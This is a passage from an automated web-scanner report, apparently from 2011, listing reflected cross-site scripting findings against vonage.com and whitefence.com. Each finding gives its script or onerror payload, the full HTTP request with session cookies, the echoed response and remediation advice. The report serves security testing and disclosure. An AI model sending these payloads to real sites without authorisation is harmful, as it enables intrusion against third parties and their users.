<script type="text/javascript">
// setting g
...[SNIP]...
}
       })
   }

   function update_media_type() {
       if ($('#media_type') != 'Local') {
           $('#state').val('All')
           $('#city').val('All')
       }
       $('#query_form').submit();
   }
   
   $("#search_header").val('xss.3d6ce';alert(1)//9336b0fa1c5');
$("#search_header").addClass('black');
   

</script>
...[SNIP]...

2.103. http://www.vonage.com/search.php [lang_cntry parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The value of the lang_cntry request parameter is copied into an HTML comment. The payload a9f48--><script>alert(1)</script>f9e759be4e4 was submitted in the lang_cntry parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_usa9f48--><script>alert(1)</script>f9e759be4e4 HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:59:47 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!-- extsearch.vonagenetworks.net/search?client=von_usa9f48--><script>alert(1)</script>f9e759be4e4_en_home&site=prod_sup_en_usa9f48-->
...[SNIP]...

2.104. http://www.vonage.com/search.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 58895--><script>alert(1)</script>b4b4607adfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=e/58895--><script>alert(1)</script>b4b4607adfbn_us HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:59:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!-- extsearch.vonagenetworks.net/search?client=von_us_e/58895--><script>alert(1)</script>b4b4607adfbn_home&site=prod_sup_e/58895-->
...[SNIP]...

2.105. http://www.vonage.com/search.php [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46c6</script><script>alert(1)</script>eae8d3091a9 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?q=xssb46c6</script><script>alert(1)</script>eae8d3091a9&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:59:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
on the custom 404 page - only takes one string value "errorPage"
       s.prop1=""
       s.prop10=""
       s.prop11="MainSite"
       s.prop12=""
       s.prop13=""
       s.prop14=""
       s.prop15=""
       s.prop43="xssb46c6</script><script>alert(1)</script>eae8d3091a9"
s.prop44="0"

       /* Hierarchy Variables */
       s.hier1="US/VDV/Vonagecom"
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
       var s_code=s.t();if(s_code)document.write(s_co
...[SNIP]...

2.106. http://www.vonage.com/search.php [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec63"><script>alert(1)</script>400bf562542 was submitted in the q parameter. This input was echoed as cec63\"><script>alert(1)</script>400bf562542 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?q=xsscec63"><script>alert(1)</script>400bf562542&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:59:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<link rel="canonical" href="http://www.vonage.com/search.php?q=xsscec63\"><script>alert(1)</script>400bf562542" />
...[SNIP]...

2.107. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 3bcd1--><img%20src%3da%20onerror%3dalert(1)>45f3ff68f71 was submitted in the REST URL parameter 2. This input was echoed as 3bcd1--><img src=a onerror=alert(1)>45f3ff68f71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/high-speed-internet3bcd1--><img%20src%3da%20onerror%3dalert(1)>45f3ff68f71/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:50 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--
body.high-speed-internet3bcd1--><img src=a onerror=alert(1)>45f3ff68f71 div#body div.description {
background: url(/objects/images/catBacks/980/high-speed-internet3bcd1-->
...[SNIP]...

2.108. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23bef"><img%20src%3da%20onerror%3dalert(1)>affc43fb5c2 was submitted in the REST URL parameter 2. This input was echoed as 23bef"><img src=a onerror=alert(1)>affc43fb5c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/high-speed-internet23bef"><img%20src%3da%20onerror%3dalert(1)>affc43fb5c2/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:40 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<body class="category-view high-speed-internet23bef"><img src=a onerror=alert(1)>affc43fb5c2">
...[SNIP]...

2.109. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbfd8"%3bf1bc04b1680 was submitted in the REST URL parameter 2. This input was echoed as cbfd8";f1bc04b1680 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/high-speed-internetcbfd8"%3bf1bc04b1680/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:41 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--

s.pageName="WF-Category-View-High-speed-internetcbfd8";f1bc04b1680";
s.eVar1="1039547";

if(typeof(_vis_opt_settings_loaded) == "boolean"){
var _combination = _vis_opt_readCookie('_vis_opt_exp_'+_vis_opt_experiment_id+'_combi');
if(typeof(_v
...[SNIP]...

2.110. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 83293--><img%20src%3da%20onerror%3dalert(1)>7f06d62cba0 was submitted in the REST URL parameter 2. This input was echoed as 83293--><img src=a onerror=alert(1)>7f06d62cba0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/home-phone83293--><img%20src%3da%20onerror%3dalert(1)>7f06d62cba0/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:52:43 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--
body.home-phone83293--><img src=a onerror=alert(1)>7f06d62cba0 div#body div.description {
background: url(/objects/images/catBacks/980/home-phone83293-->
...[SNIP]...

2.111. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7221"><img%20src%3da%20onerror%3dalert(1)>c8180e62a13 was submitted in the REST URL parameter 2. This input was echoed as a7221"><img src=a onerror=alert(1)>c8180e62a13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/home-phonea7221"><img%20src%3da%20onerror%3dalert(1)>c8180e62a13/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:52:33 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<body class="category-view home-phonea7221"><img src=a onerror=alert(1)>c8180e62a13">
...[SNIP]...

2.112. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebbf4"%3b39adcd537fe was submitted in the REST URL parameter 2. This input was echoed as ebbf4";39adcd537fe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/home-phoneebbf4"%3b39adcd537fe/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:52:34 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--

s.pageName="WF-Category-View-Home-phoneebbf4";39adcd537fe";
s.eVar1="1039547";

if(typeof(_vis_opt_settings_loaded) == "boolean"){
var _combination = _vis_opt_readCookie('_vis_opt_exp_'+_vis_opt_experiment_id+'_combi');
if(typeof(_v
...[SNIP]...

2.113. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/service-tips/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1a49"%3b5c895c7b51d was submitted in the REST URL parameter 2. This input was echoed as c1a49";5c895c7b51d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/service-tipsc1a49"%3b5c895c7b51d/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.2.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:59:52 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--

s.pageName="WF-Category-View-Service-tipsc1a49";5c895c7b51d";
s.eVar1="1039547";

if(typeof(_vis_opt_settings_loaded) == "boolean"){
var _combination = _vis_opt_readCookie('_vis_opt_exp_'+_vis_opt_experiment_id+'_combi');
if(typeof(_v
...[SNIP]...

2.114. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/service-tips/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 2775b--><img%20src%3da%20onerror%3dalert(1)>67292b8abf7 was submitted in the REST URL parameter 2. This input was echoed as 2775b--><img src=a onerror=alert(1)>67292b8abf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/service-tips2775b--><img%20src%3da%20onerror%3dalert(1)>67292b8abf7/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
